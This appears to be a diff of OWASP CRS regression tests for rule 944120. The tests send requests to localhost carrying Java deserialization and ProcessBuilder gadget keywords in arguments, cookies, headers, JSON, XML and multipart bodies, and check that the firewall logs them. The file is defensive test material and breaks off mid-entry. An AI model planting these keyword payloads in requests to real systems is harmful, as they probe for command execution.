test_id: 28 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_id: 29 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" + output: + log_contains: "id \"944120\"" + - test_id: 30 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; 
name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.forclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-32 + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; 
boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.forclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-33 + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.forclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-34 + ProcessBuilder.evil.forclosure 
+ -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.forclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-35 + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 35 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_id: 36 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory=test" + output: + log_contains: "id \"944120\"" + - test_id: 37 desc: "Cookie test includes keyword 
ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 38 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 39 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 40 desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 41 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 42 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" 
- Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 43 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_id: 44 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_id: 45 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + 
- test_id: 46 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" + output: + log_contains: "id \"944120\"" + - test_id: 47 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-49 + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 49 desc: 
"Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-50 + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-51 + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-52 + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 52 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 